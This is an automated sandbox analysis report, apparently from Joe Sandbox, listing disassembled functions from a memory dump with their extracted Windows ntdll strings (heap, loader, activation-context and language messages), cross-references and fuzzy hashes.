Instruction ID: 1328c1070e018e6bf668510222dcc79edaedcc6b108d5de64c65862fb351545e
Opcode Fuzzy Hash: 0227c8c51fd34425b19244964aee5bf4f24454f4bec5c97d225ea236069248c5
Instruction Fuzzy Hash: DC91AA71508384AFD721DF61CD41FABB7ECEB84B44F40292EFA84A2251E770D9459B62

Function 00EB0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00F054ED
HEAP: , xrefs: 00F054E0, 00F055A1
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00F055AE
HEAP[%wZ]: , xrefs: 00F054D1, 00F05592

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: e3f15b11901234353055a26fc414b820e9365e99c79ba99037570421f1f5b46f
Instruction ID: 15631058e098dffc07bc55632355f3fdeddff5e4b5f460018e82a9543fe131f4
Opcode Fuzzy Hash: e3f15b11901234353055a26fc414b820e9365e99c79ba99037570421f1f5b46f
Instruction Fuzzy Hash: CEA1E030A006459FDB24CF64C881BFBFBE1AF45704F249569E48AAB682D774F844EB91

Function 00ED273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00F121D9, 00F122B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00F122B6
.Local, xrefs: 00ED28D8
SXS: %s() passed the empty activation context, xrefs: 00F121DE

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 467f9f1ae7ca09b2f44c4fb326d86572ca237ecfcea49f3bd138ed921687e1dd
Instruction ID: 9c82eeaf8935c99377fe2f44ba8f0f60de7b8d7227ed1452a8ae834fcf04f8e0
Opcode Fuzzy Hash: 467f9f1ae7ca09b2f44c4fb326d86572ca237ecfcea49f3bd138ed921687e1dd
Instruction Fuzzy Hash: FCA18D319012299BDB25CFA4D894BE9B3B1FFA8314F2451EAD908B7351D7309E82DF90

Function 00ED4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 00F13425, 00F13432, 00F13451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00F13437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00F13456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 00F1342A

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 707d5671ef2bf64305356c504b5bfd191bb8dddcd3d5a4172b0ccd16dadc7ca7
Instruction ID: b804d019b3807e239fbd354d955383c4f116e4192a5cb58e6524567baf39735e
Opcode Fuzzy Hash: 707d5671ef2bf64305356c504b5bfd191bb8dddcd3d5a4172b0ccd16dadc7ca7
Instruction Fuzzy Hash: 79612772650B119FD722CF18C842B6AF7E5EFA4B20F14452AF859AB380DB30ED41DB91

Function 00EA64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00F01028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00F010AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00F0106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00F00FE5

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 0828d5bc3c76b4edd1bee49815584391f0fb8819104f4be1de897871dd8e669b
Instruction ID: 656f91ff1d5123ca1e6721f31c4088758eccd2a5218850897076b1c5bf9301de
Opcode Fuzzy Hash: 0828d5bc3c76b4edd1bee49815584391f0fb8819104f4be1de897871dd8e669b
Instruction Fuzzy Hash: 2D71E0B19043449FCB20DF14C885B977BE8EF4A764F541868F948AB287D734E988DBD2

Function 00EC245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00F0A9A2
LdrpDynamicShimModule, xrefs: 00F0A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00F0A992
TG, xrefs: 00EC2462

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG$minkernel\ntdll\ldrinit.c
API String ID: 0-2078120800
Opcode ID: cf2a5496daabea0ac51831a635429d51e764b0fad7f4571c33e06b59be0474e6
Instruction ID: 9e4614f2ed4f95df52be79db216ab0622fbff5a1f916d824df633f978fa7874f
Opcode Fuzzy Hash: cf2a5496daabea0ac51831a635429d51e764b0fad7f4571c33e06b59be0474e6
Instruction Fuzzy Hash: 61310772B00305EBDB249F599D45EAA77B4FB84B14F16001EF910B72A1C7749D42F781

Function 00EB29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00EB3264
HEAP[%wZ]: , xrefs: 00EB3255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00EB327D

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: e29ec580dce3cde8a3e075aee3afe593438e3700e59ad1ad8d49fd6a42cb0b43
Instruction ID: 274eee4c3b508197590cf41872393099e45b71727498d2d33f0d51f566ba8151
Opcode Fuzzy Hash: e29ec580dce3cde8a3e075aee3afe593438e3700e59ad1ad8d49fd6a42cb0b43
Instruction Fuzzy Hash: 2192AB70A042489FDB25CF68C441BEEBBF1EF48304F1890AEE959BB252D735AA45DF50

Function 00F302C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

MitigationAuditOptions, xrefs: 00F3032D
MitigationOptions, xrefs: 00F30326
"""", xrefs: 00F304D0

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: """"$MitigationAuditOptions$MitigationOptions
API String ID: 0-1670051934
Opcode ID: 30bf261e7d6a963a7def9cb366bd8de2ef28ddf4500884819d2b84274c5743f2
Instruction ID: 92667d9305fa88187177fc6c9fe3ec923ee2d8866e88095970c11416d15c8478
Opcode Fuzzy Hash: 30bf261e7d6a963a7def9cb366bd8de2ef28ddf4500884819d2b84274c5743f2
Instruction Fuzzy Hash: F122A172A047029FD724CF29C96162AFBE1BBD4330F24892FE1DA87694DB71E904DB41

Function 00EB0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 00F050CA
HEAP: , xrefs: 00F050BD
HEAP[%wZ]: , xrefs: 00F050AE

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: e779b96b51efc8ca027b90ba80d08905f33cb754ec9733ad4b9b7e3abecb6476
Instruction ID: b33da2406c83f4a7b3714dfb8e49e2a3c55c0f7b77d7b066cea61f6e578c78ef
Opcode Fuzzy Hash: e779b96b51efc8ca027b90ba80d08905f33cb754ec9733ad4b9b7e3abecb6476
Instruction Fuzzy Hash: B6F16B70A00605DFDB15CF68C894BABB7B5FF84704F248169E416AB292D774BD81EF90

Function 00EA1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00EA1728
HEAP: , xrefs: 00EA1596
HEAP[%wZ]: , xrefs: 00EA1712

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 9106ca6b5bdac4bc2633637cb0d5e81cc2c8f19e13091d4616162bcd08ff8c08
Instruction ID: 106bed493f8dbb69d0b68e7f1ad0fb1ec474e48ad63de9f0506bdc1faf791887
Opcode Fuzzy Hash: 9106ca6b5bdac4bc2633637cb0d5e81cc2c8f19e13091d4616162bcd08ff8c08
Instruction Fuzzy Hash: 71E10630A046459FCB18CF68C4517BABBF1EF8A304F1494AEE596EF286D734E940DB50

Function 00EC6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 00F0CA51
@, xrefs: 00EC6C24

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: d7728f408b0f0a0cac7a1cbf839f2fb9202ae007def2c70f0c862a9f4a0ffd32
Instruction ID: e890d79eed242eb70bc08d313ac0cfa8851bb798e1cbbc723f5c026a5388d1ce
Opcode Fuzzy Hash: d7728f408b0f0a0cac7a1cbf839f2fb9202ae007def2c70f0c862a9f4a0ffd32
Instruction Fuzzy Hash: 1CC29B71A083419FDB25CF24C981FABBBE5AF88314F04992DF9C9A7241D735D806DB92

Function 00E9A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 00E9A1C1
\??\, xrefs: 00EFC1E4
FilterFullPath, xrefs: 00EFC2E6

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: d2dcfa1347cd27298f31696fcd2fa6fa5e73487ea486ef71cb599c06c872e6b0
Instruction ID: b2002f3e5c6ec9a9daa5b9372fa713747eb8b67252287fa8a52b7b4c5879b1ec
Opcode Fuzzy Hash: d2dcfa1347cd27298f31696fcd2fa6fa5e73487ea486ef71cb599c06c872e6b0
Instruction Fuzzy Hash: B9A1687190162D9BDB219F64CD88BEAB7B8EF44704F2051EAEA08B7250D7359E85CF90

Function 00EC0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 00F0A10F
LdrpCheckModule, xrefs: 00F0A117
minkernel\ntdll\ldrinit.c, xrefs: 00F0A121

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: fd390c7b575659b09d4d00c02704ca417b1fb5868b086f42a77e25db99714919
Instruction ID: 7a8e2b9fd519a549240f840807e6f6861e234e5bcc5ac8a0892dc046c8353cba
Opcode Fuzzy Hash: fd390c7b575659b09d4d00c02704ca417b1fb5868b086f42a77e25db99714919
Instruction Fuzzy Hash: B971CF71A00209DFCB15DF68CA81FBEB7F4EB84704F14512EE816E7251E635AD42EB51

Function 00EB0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00F05342
HEAP[%wZ]: , xrefs: 00F05335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 00F0534D

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: f921dc9d8588fb928cd30a2da6f865d4b9983df222382e169f2e36ce7e59bde6
Instruction ID: 87e9bb36a25657228cb32918f67672b591f77cb4925a93dbd15745a1d1210be5
Opcode Fuzzy Hash: f921dc9d8588fb928cd30a2da6f865d4b9983df222382e169f2e36ce7e59bde6
Instruction Fuzzy Hash: 8361AE716007059FDB28CF24C881BABBBE1FF45708F24955AE4599F292D7B0E881EB91

Function 00E9CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

@, xrefs: 00E9CD63
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00E9CD34
InstallLanguageFallback, xrefs: 00E9CD7F

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: af85a055b86570062c513149387ede33392da7803a5103bdbc936e9a7d0a0975
Instruction ID: d772b988a92c97e456d8326aa650961ce280cb6b48a0ff898617c6c4ccd0bedb
Opcode Fuzzy Hash: af85a055b86570062c513149387ede33392da7803a5103bdbc936e9a7d0a0975
Instruction Fuzzy Hash: 0551B1B65043599BC710DF64C444ABBB7E8AF88718F14193EFA99F7240E770DE058BA2

Function 00EDC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 00F182DE
minkernel\ntdll\ldrinit.c, xrefs: 00F182E8
Failed to reallocate the system dirs string !, xrefs: 00F182D7

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: b04697bc962ed0fc20a6ea7fd5481b710f81d5049877e7174171935d9557c339
Instruction ID: df39d95da002b37cd3f23f12c597e168a083cec0355e9ec82976993931bcce6e
Opcode Fuzzy Hash: b04697bc962ed0fc20a6ea7fd5481b710f81d5049877e7174171935d9557c339
Instruction Fuzzy Hash: CA41F0B1505304ABC720EB78DD45B9B77E8EF48790F14582BF948E72A1EB74D801EB91

Function 00F5C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00F5C1C5
PreferredUILanguages, xrefs: 00F5C212
@, xrefs: 00F5C1F1

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 52492b0c10db438ba790c19695a98834ab8077f6e3e1597c4e057f0ee60f739b
Instruction ID: f29dc2e205088201ef62bb7c92b1d845f98fe1e0ca9831fd18c2a21c97ef99ea
Opcode Fuzzy Hash: 52492b0c10db438ba790c19695a98834ab8077f6e3e1597c4e057f0ee60f739b
Instruction Fuzzy Hash: 0C416C72E00319EFDF11DED4C891FEEBBB8AB14715F14406AEA06B7281D7749E489B90

Function 00F34144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 00F34225
LdrpResValidateFilePath Exit, xrefs: 00F34172
LdrpResValidateFilePath Enter, xrefs: 00F34160

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 4b01f478857be84e20a43e31741ff558f19ef1256d22ec709b9f50bf0c426df9
Instruction ID: a54f0f3edc18c020027fbfdf96da678660fa411bf596f001d9363b8b3b491b3e
Opcode Fuzzy Hash: 4b01f478857be84e20a43e31741ff558f19ef1256d22ec709b9f50bf0c426df9
Instruction Fuzzy Hash: 7241E332D04658CBEB22EBA4C841BAEB7F4EF45360F25045AE801FB791D774B941DB11

Function 00F24755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00F24888
LdrpCheckRedirection, xrefs: 00F2488F
minkernel\ntdll\ldrredirect.c, xrefs: 00F24899

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b04a8ecaf9bdd4e4a865f7f7cba38331be1347113d3186b319fd9f1fcaade1e3
Instruction ID: 23b1c153f38286b30e2fdf1d6f1879a5c8a0db7e9e07ad2a7f89c38ec4202f2e
Opcode Fuzzy Hash: b04a8ecaf9bdd4e4a865f7f7cba38331be1347113d3186b319fd9f1fcaade1e3
Instruction Fuzzy Hash: 40418432A157719BCB21CF58E840A6677E4BF49B60B050659EC99DB351D7B0FC00EB91

Function 00EAA2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 00EAA309
RtlpResUltimateFallbackInfo Enter, xrefs: 00EAA2FB
PS, xrefs: 00EAA348

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: PS$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-405261330
Opcode ID: 12f70fe34c7d4ac2c6cd08586e751d8bb97326d68eaa32341380cec9bc75dfab
Instruction ID: 3e9e8974cbf2e8aa04b4e5ad5aed47c8d65829dc5a3259c45b2564bff2f91687
Opcode Fuzzy Hash: 12f70fe34c7d4ac2c6cd08586e751d8bb97326d68eaa32341380cec9bc75dfab
Instruction Fuzzy Hash: 1041BD71A00755DBDF21CF69C844BAEB7B4EF8A314F2840A5E804EF291E375EA04EB51

Function 00EB0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00F0543E
HEAP[%wZ]: , xrefs: 00F05431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 00F05449

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 4a146c695a3b9fa5707255eb5ba526be0f5fb821a7bc3930b0bfb61eeea99c5f
Instruction ID: 77eb1bcb33ab01d6f44c42c15986e0d3ecb070b019cbdc743dc9c687fc80dfa9
Opcode Fuzzy Hash: 4a146c695a3b9fa5707255eb5ba526be0f5fb821a7bc3930b0bfb61eeea99c5f
Instruction Fuzzy Hash: B411DF35314941DFCB28C714D8A1BFBB3A4EF40B29F24915AE406EB2A1DB70EC80EB50

Function 00F220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 00F22104
Process initialization failed with status 0x%08lx, xrefs: 00F220F3
LdrpInitializationFailure, xrefs: 00F220FA

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: b380910bcd66e221efb92e6b72aecee97f98c9c44b5c144ea810a1483a2938c2
Instruction ID: dfff3887520ca555162d657318f8ba19421b890bdbcb45f911cbb242f36d1b46
Opcode Fuzzy Hash: b380910bcd66e221efb92e6b72aecee97f98c9c44b5c144ea810a1483a2938c2
Instruction Fuzzy Hash: 4EF0F671A4031CBBDB24EB4CDC57F993768EB80B54F100069FB08772C2D6B4AA50EB91

Function 00EB03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00F04D8A

Strings

#%u, xrefs: 00F04D82

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 2f99a3158e08ddfdee5531c1e6ec17a85f7156de80cb7802432b9d28860ab9f1
Instruction ID: 792e5dd3ddb4e1defdc0fbc3fb712219af0efbb339d3ae6a4debff43d654550c
Opcode Fuzzy Hash: 2f99a3158e08ddfdee5531c1e6ec17a85f7156de80cb7802432b9d28860ab9f1
Instruction Fuzzy Hash: 33715E72A001499FDB11DFA8C991BEEB7F8AF08714F154065EA05F7291EA34EE01DB60

Function 00EAC7C0 Relevance: 3.5, Strings: 2, Instructions: 960COMMON

Download Yara Rule

Strings

\U, xrefs: 00EACA5F
MUI, xrefs: 00EAC8C3, 00EACA40

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: MUI$\U
API String ID: 0-3971960151
Opcode ID: a2b47a2ed28ba58ccb8ddd46328e53d1a2f5d44185934e6383410e0f6ad4d15f
Instruction ID: d8096de95c47749495a9d82fa5b216b5e56bb2cf33a3cdff0d7c457d6518b8ef
Opcode Fuzzy Hash: a2b47a2ed28ba58ccb8ddd46328e53d1a2f5d44185934e6383410e0f6ad4d15f
Instruction Fuzzy Hash: EF823875E042189FDB24CFA9C880BEDB7B1BF4E314F249169E85ABB651D730AD81CB50

Function 00EB52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 00EB55A3
@, xrefs: 00EB5445

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 552a19b6e9499fac36134d7523196af96e4553898689a6baa11e2e27bd461fb3
Instruction ID: 322972f56e0d93b8f3186259268da65b51c0ba36a5667c0adf5b94d90148bffd
Opcode Fuzzy Hash: 552a19b6e9499fac36134d7523196af96e4553898689a6baa11e2e27bd461fb3
Instruction Fuzzy Hash: B032AC726087118BD7288F14C480BBFB7E1EF84754F54592EF995AB294E734DC80EB92

Function 00EAA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 00EAAA25
LdrResSearchResource Enter, xrefs: 00EAAA13

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 5a04287dc008000b1ce1924d56ded408f078c9f5a65d613f36bb3398c774950b
Instruction ID: 5834b8ce0b942c718ab90b2fd3a5376c718ef41ca5d099042c0aeab6e18f7e93
Opcode Fuzzy Hash: 5a04287dc008000b1ce1924d56ded408f078c9f5a65d613f36bb3398c774950b
Instruction Fuzzy Hash: B6E17271E00319ABEB21CE95C984BEEB7B9AF19354F14503AF801FB291D774AD40EB61

Function 00F6A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 00F6A44B
`, xrefs: 00F6A551

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: e381302d987cab7a44df621c554a01764d4c9e7ce27932eb853699e684f812df
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 79C1E1316043429BD724CF24C841B6BBBE5EFC4328F184A2CF596EA291DB75D905EF52

Function 00EA0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

ResIdCount less than 2., xrefs: 00EFEEC9
Failed to retrieve service checksum., xrefs: 00EFEE56

Memory Dump Source

Source File: 00000000.00000002.1907253978.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_alWUxZvrvU.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 4e94701e1e99e6707c0b9fd9b3987e9c1f38ec82cd3e3195452473f1eeb70101
Instruction ID: 03cd6eb12d1c7141a558f7601c60481d5e4906c8bb8fbcdce8e32f2fddb4b085
